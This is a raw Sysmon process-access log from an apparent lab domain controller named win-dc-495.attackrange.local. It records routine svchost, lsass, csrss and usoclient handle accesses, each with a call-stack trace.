13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 